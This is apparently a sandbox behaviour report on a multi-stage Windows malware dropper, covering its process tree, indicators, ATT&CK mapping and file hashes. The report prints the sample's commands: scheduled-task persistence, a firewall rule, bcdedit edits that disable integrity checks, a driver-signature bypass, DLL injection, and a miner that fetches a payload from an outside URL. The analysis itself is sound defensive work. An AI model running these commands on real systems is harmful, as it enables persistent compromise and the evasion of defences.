b0e941f8da0d9cea8f430d15ef2b4 rty25.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a42000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 csrss.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 040000000100000010000000acb694a59c17e0d791529bb19706a6e4030000000100000014000000d4de20d05e66fc53fe1a50882c78db2852cae47409000000010000000c000000300a06082b060105050703011d0000000100000010000000918ad43a9475f78bb5243de886d8103c140000000100000014000000e59d5930824758ccacfa085436867b3ab5044df053000000010000002400000030223020060a2b06010401b13e01640130123010060a2b0601040182373c0101030200c00b0000000100000034000000420061006c00740069006d006f007200650020004300790062006500720054007200750073007400200052006f006f00740000000f0000000100000014000000ce0e658aa3e847e467a147b3049191093d055e6f20000000010000007b030000308203773082025fa0030201020204020000b9300d06092a864886f70d0101050500305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f74301e170d3030303531323138343630305a170d3235303531323233353930305a305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100a304bb22ab983d57e826729ab579d429e2e1e89580b1b0e35b8e2b299a64dfa15dedb009056ddb282ece62a262feb488da12eb38eb219dc0412b01527b8877d31c8fc7bab988b56a09e773e81140a7d1ccca628d2de58f0ba650d2a850c328eaf5ab25878a9a961ca967b83f0cd5f7f952132fc21bd57070f08fc012ca06cb9ae1d9ca337a77d6f8ecb9f16844424813d2c0c2a4ae5e60feb6a605fcb4dd075902d459189863f5a563e0900c7d5db2067af385eaebd403ae5e843e5fff15ed69bcf939367275cf77524df3c9902cb93de5c923533f1f2498215c079929bdc63aece76e863a6b97746333bd681831f0788d76bffc9e8e5d2a86a74d90dc271a390203010001a3453043301d0603551d0e04160414e59d5930824758ccacfa085436867b3ab5044df030120603551d130101ff040830060101ff020103300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100850c5d8ee46f51684205a0ddbb4f27258403bdf764fd2dd730e3a41017ebda2929b6793f76f6191323b8100af958a4d46170bd04616a128a17d50abdc5bc307cd6e90c258d86404feccca37e38c637114feddd68318e4cd2b30174eebe755e07481a7f70ff165c84c07985b805fd7fbe6511a30fc002b4f852373904d5a9317a18bfa02af41299f7a34582e33c5ef59d9eb5c89e7c2ec8a49e4e08144b6dfd706d6b1a63bd64e61fb7cef0f29f2ebb1bb7f250887392c2e2e3168d9a3202ab8e18dde91011ee7e35ab90af3e30947ad0333da7650ff5fc8e9e62cf47442c015dbb1db532d247d2382ed0fe81dc326a1eb5ee3cd5fce7811d19c32442ea6339a9 patch.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
toolspub1.exed21cbe21e38b385a41a68c5e6dd32f4c.exed21cbe21e38b385a41a68c5e6dd32f4c.exeinjector.exeu110.0.exepid process 2884 toolspub1.exe 2884 toolspub1.exe 2700 d21cbe21e38b385a41a68c5e6dd32f4c.exe 2736 d21cbe21e38b385a41a68c5e6dd32f4c.exe 2736 d21cbe21e38b385a41a68c5e6dd32f4c.exe 2736 d21cbe21e38b385a41a68c5e6dd32f4c.exe 2736 d21cbe21e38b385a41a68c5e6dd32f4c.exe 2736 d21cbe21e38b385a41a68c5e6dd32f4c.exe 1192 1192 1192 1192 1192 1192 1192 1192 1192 1192 1192 1192 1192 1192 1192 1192 1192 1192 1192 1596 injector.exe 1192 1192 1192 1192 1192 1192 1192 1192 1192 1192 1596 injector.exe 1192 1192 1192 1192 1192 1192 1192 1192 1192 1596 injector.exe 1192 1192 1668 u110.0.exe 1192 1192 1192 1192 1192 1192 1192 1596 injector.exe 1192 1192 1192 1192 -
Suspicious behavior: LoadsDriver 1 IoCs
Processes:
pid process 476 -
Suspicious behavior: MapViewOfSection 3 IoCs
Processes:
toolspub1.exeD587.exeurhaieapid process 2884 toolspub1.exe 1636 D587.exe 1684 urhaiea -
Suspicious use of AdjustPrivilegeToken 8 IoCs
Processes:
d21cbe21e38b385a41a68c5e6dd32f4c.execsrss.exesc.exewup.exedescription pid process Token: SeDebugPrivilege 2700 d21cbe21e38b385a41a68c5e6dd32f4c.exe Token: SeImpersonatePrivilege 2700 d21cbe21e38b385a41a68c5e6dd32f4c.exe Token: SeSystemEnvironmentPrivilege 2904 csrss.exe Token: SeShutdownPrivilege 1192 Token: SeSecurityPrivilege 2760 sc.exe Token: SeSecurityPrivilege 2760 sc.exe Token: SeShutdownPrivilege 1192 Token: SeLockMemoryPrivilege 1972 wup.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
Processes:
wup.exepid process 1972 wup.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
u110.1.exepid process 1740 u110.1.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
1f435b3a62304733dce1b9caf24cfac768db739127e8ec31d466455628ec0922.exed21cbe21e38b385a41a68c5e6dd32f4c.execmd.exeInstallSetup_nine.execsrss.exeu110.1.execmd.exepatch.exedescription pid process target process PID 2424 wrote to memory of 1332 2424 1f435b3a62304733dce1b9caf24cfac768db739127e8ec31d466455628ec0922.exe InstallSetup_nine.exe PID 2424 wrote to memory of 1332 2424 1f435b3a62304733dce1b9caf24cfac768db739127e8ec31d466455628ec0922.exe InstallSetup_nine.exe PID 2424 wrote to memory of 1332 2424 1f435b3a62304733dce1b9caf24cfac768db739127e8ec31d466455628ec0922.exe InstallSetup_nine.exe PID 2424 wrote to memory of 1332 2424 1f435b3a62304733dce1b9caf24cfac768db739127e8ec31d466455628ec0922.exe InstallSetup_nine.exe PID 2424 wrote to memory of 1332 2424 1f435b3a62304733dce1b9caf24cfac768db739127e8ec31d466455628ec0922.exe InstallSetup_nine.exe PID 2424 wrote to memory of 1332 2424 1f435b3a62304733dce1b9caf24cfac768db739127e8ec31d466455628ec0922.exe InstallSetup_nine.exe PID 2424 wrote to memory of 1332 2424 1f435b3a62304733dce1b9caf24cfac768db739127e8ec31d466455628ec0922.exe InstallSetup_nine.exe PID 2424 wrote to memory of 2700 2424 1f435b3a62304733dce1b9caf24cfac768db739127e8ec31d466455628ec0922.exe d21cbe21e38b385a41a68c5e6dd32f4c.exe PID 2424 wrote to memory of 2700 2424 1f435b3a62304733dce1b9caf24cfac768db739127e8ec31d466455628ec0922.exe d21cbe21e38b385a41a68c5e6dd32f4c.exe PID 2424 wrote to memory of 2700 2424 1f435b3a62304733dce1b9caf24cfac768db739127e8ec31d466455628ec0922.exe d21cbe21e38b385a41a68c5e6dd32f4c.exe PID 2424 wrote to memory of 2700 2424 1f435b3a62304733dce1b9caf24cfac768db739127e8ec31d466455628ec0922.exe d21cbe21e38b385a41a68c5e6dd32f4c.exe PID 2424 wrote to memory of 2708 2424 1f435b3a62304733dce1b9caf24cfac768db739127e8ec31d466455628ec0922.exe rty25.exe PID 2424 wrote to memory of 2708 2424 1f435b3a62304733dce1b9caf24cfac768db739127e8ec31d466455628ec0922.exe rty25.exe PID 2424 wrote to memory of 2708 2424 1f435b3a62304733dce1b9caf24cfac768db739127e8ec31d466455628ec0922.exe rty25.exe PID 2424 wrote to memory of 2708 2424 1f435b3a62304733dce1b9caf24cfac768db739127e8ec31d466455628ec0922.exe rty25.exe PID 2424 wrote to memory of 2884 2424 1f435b3a62304733dce1b9caf24cfac768db739127e8ec31d466455628ec0922.exe toolspub1.exe PID 2424 wrote to memory of 2884 2424 1f435b3a62304733dce1b9caf24cfac768db739127e8ec31d466455628ec0922.exe toolspub1.exe PID 2424 wrote to memory of 2884 2424 1f435b3a62304733dce1b9caf24cfac768db739127e8ec31d466455628ec0922.exe toolspub1.exe PID 2424 wrote to memory of 2884 2424 1f435b3a62304733dce1b9caf24cfac768db739127e8ec31d466455628ec0922.exe toolspub1.exe PID 2736 wrote to memory of 1036 2736 d21cbe21e38b385a41a68c5e6dd32f4c.exe cmd.exe PID 2736 wrote to memory of 1036 2736 d21cbe21e38b385a41a68c5e6dd32f4c.exe cmd.exe PID 2736 wrote to memory of 1036 2736 d21cbe21e38b385a41a68c5e6dd32f4c.exe cmd.exe PID 2736 wrote to memory of 1036 2736 d21cbe21e38b385a41a68c5e6dd32f4c.exe cmd.exe PID 1036 wrote to memory of 768 1036 cmd.exe netsh.exe PID 1036 wrote to memory of 768 1036 cmd.exe netsh.exe PID 1036 wrote to memory of 768 1036 cmd.exe netsh.exe PID 2736 wrote to memory of 2904 2736 d21cbe21e38b385a41a68c5e6dd32f4c.exe csrss.exe PID 2736 wrote to memory of 2904 2736 d21cbe21e38b385a41a68c5e6dd32f4c.exe csrss.exe PID 2736 wrote to memory of 2904 2736 d21cbe21e38b385a41a68c5e6dd32f4c.exe csrss.exe PID 2736 wrote to memory of 2904 2736 d21cbe21e38b385a41a68c5e6dd32f4c.exe csrss.exe PID 1332 wrote to memory of 1668 1332 InstallSetup_nine.exe u110.0.exe PID 1332 wrote to memory of 1668 1332 InstallSetup_nine.exe u110.0.exe PID 1332 wrote to memory of 1668 1332 InstallSetup_nine.exe u110.0.exe PID 1332 wrote to memory of 1668 1332 InstallSetup_nine.exe u110.0.exe PID 2904 wrote to memory of 1596 2904 csrss.exe injector.exe PID 2904 wrote to memory of 1596 2904 csrss.exe injector.exe PID 2904 wrote to memory of 1596 2904 csrss.exe injector.exe PID 2904 wrote to memory of 1596 2904 csrss.exe injector.exe PID 1332 wrote to memory of 1740 1332 InstallSetup_nine.exe u110.1.exe PID 1332 wrote to memory of 1740 1332 InstallSetup_nine.exe u110.1.exe PID 1332 wrote to memory of 1740 1332 InstallSetup_nine.exe u110.1.exe PID 1332 wrote to memory of 1740 1332 InstallSetup_nine.exe u110.1.exe PID 1192 wrote to memory of 1636 1192 D587.exe PID 1192 wrote to memory of 1636 1192 D587.exe PID 1192 wrote to memory of 1636 1192 D587.exe PID 1192 wrote to memory of 1636 1192 D587.exe PID 1740 wrote to memory of 2888 1740 u110.1.exe cmd.exe PID 1740 wrote to memory of 2888 1740 u110.1.exe cmd.exe PID 1740 wrote to memory of 2888 1740 u110.1.exe cmd.exe PID 1740 wrote to memory of 2888 1740 u110.1.exe cmd.exe PID 2888 wrote to memory of 2052 2888 cmd.exe chcp.com PID 2888 wrote to memory of 2052 2888 cmd.exe chcp.com PID 2888 wrote to memory of 2052 2888 cmd.exe chcp.com PID 2888 wrote to memory of 2052 2888 cmd.exe chcp.com PID 2888 wrote to memory of 1728 2888 cmd.exe schtasks.exe PID 2888 wrote to memory of 1728 2888 cmd.exe schtasks.exe PID 2888 wrote to memory of 1728 2888 cmd.exe schtasks.exe PID 2888 wrote to memory of 1728 2888 cmd.exe schtasks.exe PID 1944 wrote to memory of 1236 1944 patch.exe bcdedit.exe PID 1944 wrote to memory of 1236 1944 patch.exe bcdedit.exe PID 1944 wrote to memory of 1236 1944 patch.exe bcdedit.exe PID 1944 wrote to memory of 1684 1944 patch.exe bcdedit.exe PID 1944 wrote to memory of 1684 1944 patch.exe bcdedit.exe PID 1944 wrote to memory of 1684 1944 patch.exe bcdedit.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\1f435b3a62304733dce1b9caf24cfac768db739127e8ec31d466455628ec0922.exe"C:\Users\Admin\AppData\Local\Temp\1f435b3a62304733dce1b9caf24cfac768db739127e8ec31d466455628ec0922.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2424 -
C:\Users\Admin\AppData\Local\Temp\InstallSetup_nine.exe"C:\Users\Admin\AppData\Local\Temp\InstallSetup_nine.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1332 -
C:\Users\Admin\AppData\Local\Temp\u110.0.exe"C:\Users\Admin\AppData\Local\Temp\u110.0.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:1668
-
-
C:\Users\Admin\AppData\Local\Temp\u110.1.exe"C:\Users\Admin\AppData\Local\Temp\u110.1.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1740 -
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Roaming\Temp\Task.bat" "4⤵
- Suspicious use of WriteProcessMemory
PID:2888 -
C:\Windows\SysWOW64\chcp.comchcp 12515⤵PID:2052
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn "MalayamaraUpdate" /tr "'C:\Users\Admin\AppData\Local\Temp\Updater.exe'" /sc minute /mo 30 /F5⤵
- DcRat
- Creates scheduled task(s)
PID:1728
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\d21cbe21e38b385a41a68c5e6dd32f4c.exe"C:\Users\Admin\AppData\Local\Temp\d21cbe21e38b385a41a68c5e6dd32f4c.exe"2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2700 -
C:\Users\Admin\AppData\Local\Temp\d21cbe21e38b385a41a68c5e6dd32f4c.exe"C:\Users\Admin\AppData\Local\Temp\d21cbe21e38b385a41a68c5e6dd32f4c.exe"3⤵
- DcRat
- Windows security bypass
- Executes dropped EXE
- Loads dropped DLL
- Windows security modification
- Adds Run key to start application
- Checks for VirtualBox DLLs, possible anti-VM trick
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2736 -
C:\Windows\system32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"4⤵
- Suspicious use of WriteProcessMemory
PID:1036 -
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes5⤵
- DcRat
- Modifies Windows Firewall
- Modifies data under HKEY_USERS
PID:768
-
-
-
C:\Windows\rss\csrss.exeC:\Windows\rss\csrss.exe4⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
- Manipulates WinMon driver.
- Manipulates WinMonFS driver.
- Drops file in Windows directory
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2904 -
C:\Windows\system32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F5⤵
- DcRat
- Creates scheduled task(s)
PID:2776
-
-
C:\Windows\system32\schtasks.exeschtasks /delete /tn ScheduledUpdate /f5⤵PID:1916
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"5⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies system certificate store
- Suspicious use of WriteProcessMemory
PID:1944 -
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -create {71A3C7FC-F751-4982-AEC1-E958357E6813} -d "Windows Fast Mode" -application OSLOADER6⤵
- Modifies boot configuration data using bcdedit
PID:1236
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} device partition=C:6⤵
- Modifies boot configuration data using bcdedit
PID:1684
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} osdevice partition=C:6⤵
- Modifies boot configuration data using bcdedit
PID:2960
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} systemroot \Windows6⤵
- Modifies boot configuration data using bcdedit
PID:1268
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} path \Windows\system32\osloader.exe6⤵
- Modifies boot configuration data using bcdedit
PID:1092
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} kernel ntkrnlmp.exe6⤵
- Modifies boot configuration data using bcdedit
PID:2700
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} recoveryenabled 06⤵
- Modifies boot configuration data using bcdedit
PID:2672
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nx OptIn6⤵
- Modifies boot configuration data using bcdedit
PID:2876
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nointegritychecks 16⤵
- Modifies boot configuration data using bcdedit
PID:1936
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} inherit {bootloadersettings}6⤵
- Modifies boot configuration data using bcdedit
PID:596
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -displayorder {71A3C7FC-F751-4982-AEC1-E958357E6813} -addlast6⤵
- Modifies boot configuration data using bcdedit
PID:1772
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -timeout 06⤵
- Modifies boot configuration data using bcdedit
PID:1820
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -default {71A3C7FC-F751-4982-AEC1-E958357E6813}6⤵
- Modifies boot configuration data using bcdedit
PID:2580
-
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exeC:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:1596
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\Sysnative\bcdedit.exe /v5⤵
- Modifies boot configuration data using bcdedit
PID:2884
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exeC:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe5⤵
- Executes dropped EXE
PID:2332
-
-
C:\Windows\system32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F5⤵
- DcRat
- Creates scheduled task(s)
PID:612
-
-
C:\Windows\windefender.exe"C:\Windows\windefender.exe"5⤵
- Executes dropped EXE
PID:2096 -
C:\Windows\SysWOW64\cmd.execmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)6⤵PID:1860
-
C:\Windows\SysWOW64\sc.exesc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)7⤵
- Launches sc.exe
- Suspicious use of AdjustPrivilegeToken
PID:2760
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\dcb505dc2b9d8aac05f4ca0727f5eadb.exeC:\Users\Admin\AppData\Local\Temp\csrss\dcb505dc2b9d8aac05f4ca0727f5eadb.exe -xor=uiGheigee2Wuisoh -m=https://cdn.discordapp.com/attachments/1176914652060459101/1177177956087504956/xDYNmhJEPV -pool tls://showlock.net:40001 -pool tls://showlock.net:443 -pool tcp://showlock.net:805⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2616 -
C:\Users\Admin\AppData\Local\Temp\csrss\wup\xarch\wup.exeC:\Users\Admin\AppData\Local\Temp\csrss\wup\xarch\wup.exe -o showlock.net:40001 --rig-id ea009da4-362d-4101-97f2-d5b863279a34 --tls --nicehash -o showlock.net:443 --rig-id ea009da4-362d-4101-97f2-d5b863279a34 --tls --nicehash -o showlock.net:80 --rig-id ea009da4-362d-4101-97f2-d5b863279a34 --nicehash --http-port 3433 --http-access-token ea009da4-362d-4101-97f2-d5b863279a34 --randomx-wrmsr=-16⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:1972
-
-
C:\Windows\rss\csrss.exeC:\Windows\rss\csrss.exe -hide 19726⤵
- Executes dropped EXE
- Manipulates WinMon driver.
PID:1236
-
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\713674d5e968cbe2102394be0b2bae6f.exeC:\Users\Admin\AppData\Local\Temp\csrss\713674d5e968cbe2102394be0b2bae6f.exe5⤵
- Executes dropped EXE
PID:996
-
-
C:\Windows\system32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F5⤵
- DcRat
- Creates scheduled task(s)
PID:1284
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\1bf850b4d9587c1017a75a47680584c4.exeC:\Users\Admin\AppData\Local\Temp\csrss\1bf850b4d9587c1017a75a47680584c4.exe5⤵
- Executes dropped EXE
PID:1572
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\rty25.exe"C:\Users\Admin\AppData\Local\Temp\rty25.exe"2⤵
- Executes dropped EXE
- Modifies system certificate store
PID:2708
-
-
C:\Users\Admin\AppData\Local\Temp\toolspub1.exe"C:\Users\Admin\AppData\Local\Temp\toolspub1.exe"2⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:2884
-
-
C:\Windows\system32\makecab.exe"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20240208190338.log C:\Windows\Logs\CBS\CbsPersist_20240208190338.cab1⤵
- Drops file in Windows directory
PID:3056
-
C:\Users\Admin\AppData\Local\Temp\D587.exeC:\Users\Admin\AppData\Local\Temp\D587.exe1⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:1636
-
C:\Windows\windefender.exeC:\Windows\windefender.exe1⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:2040
-
C:\Users\Admin\AppData\Local\Temp\A4D8.exeC:\Users\Admin\AppData\Local\Temp\A4D8.exe1⤵
- Executes dropped EXE
PID:2748 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2748 -s 962⤵
- Loads dropped DLL
- Program crash
PID:1960
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {6AAF0F85-DA6A-4E9A-8FB9-C4D843994EE9} S-1-5-21-3818056530-936619650-3554021955-1000:SFVRQGEO\Admin:Interactive:[1]1⤵PID:2056
-
C:\Users\Admin\AppData\Roaming\urhaieaC:\Users\Admin\AppData\Roaming\urhaiea2⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:1684
-
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Defense Evasion
Impair Defenses
4Disable or Modify System Firewall
1Disable or Modify Tools
2Modify Registry
4Subvert Trust Controls
1Install Root Certificate
1Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize344B
MD50be914f5266ce916cd36b1e30589e10c
SHA1ad2b832b7bf0c9ea4cfccffdfe2e0baf687cbc33
SHA2569c862381df64f94917304f267f92327e1a96e68a74a7e02f8d229b65c852b06b
SHA512c5735150ea3fe6b6aa5a250022cd3e6cd7cb13e6d3b72ff5102925fa89cafd9401ebd2add22c8f2fe786e91d28fbb8a499fac7444c4898db3778cd4fa47fd73e
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize344B
MD508f4e7e785ff8fbd9071d5e22b57d516
SHA1de0aa70431461eb290696af7ad84833e639e56d6
SHA25615318e3f93fdd0e5dfb6f7d44ac1217106fa43e7929c628b6edde58dcfb12b25
SHA5124c9cbc86a6d43a81f3a447ad7f017c905ed39d0e6e5be85ea6aef27e90befd4064167edcac479a1442fea4f8afe2fbb10c1e49c6ec5f835bc7c7b4f9da0cd4bb
-
Filesize
6.0MB
MD595e59305ad61119cf15ee95562bd05ba
SHA10f0059cda9609c46105cf022f609c407f3718e04
SHA256dd87f94c961b9612bbd65761bee6ed15318d63652f262e2c425bd177a2341a19
SHA5125fbcfe79162460080e0c3944df747835f0b8f2cdb35b038eb69eadf2eb85a209f7d5432a328d0f0eeafba036012f48793e3c08d94531b98a12a498bcf3b00ad2
-
Filesize
65KB
MD5ac05d27423a85adc1622c714f2cb6184
SHA1b0fe2b1abddb97837ea0195be70ab2ff14d43198
SHA256c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d
SHA5126d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d
-
Filesize
170KB
MD569d761d941e1a7a4721e267e91167b3a
SHA17e83135738bdd132a8c9da031b4794852cfc9f8b
SHA256c6d317e1eb756b3577414068ac20fc445921f4edd86bef21dbab2d89920e4649
SHA5124ccfe22c2a726f10e4956383fb12371cc07be797707ac6b5dba1a14a5b798c24503bd4f29302c525240dffd0a3f1d3775ff575a2fddb4443df974d1de5ce1295
-
Filesize
419KB
MD5654abe1db0f972272b5b012914d9e5d6
SHA11ac7b42167369dcfa528837f13a2c80de7bcc161
SHA2565f2bdf7f83ab075f7dafaf7493cbf4ab08d2e79b95cd3382621acfe73ba96094
SHA51218823ab8a9a160ac169052ec210e6adb356190dc0644c8b5fd6f5ccbc8de2666c5e9d44ef90c954d5b6e948c81ef2666900c0fe40b7d5e4b644a39e8b93c1a12
-
C:\Users\Admin\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\AAF33CF37E194E98957768CF9C02DE8E2\download.error
Filesize7.2MB
MD5877012c992df9734c4f54c6167626655
SHA1fefd114569cf1b5093ad4454c9f9ef9a47a4756c
SHA256a7b7a4b1e3793ddb0036749ec0c1e3c5b4f12f1af308f6f72959d648e8ab6262
SHA51235adf878ef4a9720f0823de32b736efede74ae8e8cecde0eabdd4e6172796f6ddc5eeb231e2eac6e4dc44f9765a2c5bee4832424c12cf2fb37e8c0e8b4e2ad26
-
C:\Users\Admin\AppData\Local\Temp\Symbols\winload_prod.pdb\768283CA443847FB8822F9DB1F36ECC51\download.error
Filesize492KB
MD5fafbf2197151d5ce947872a4b0bcbe16
SHA1a86eaa2dd9fc6d36fcfb41df7ead8d1166aea020
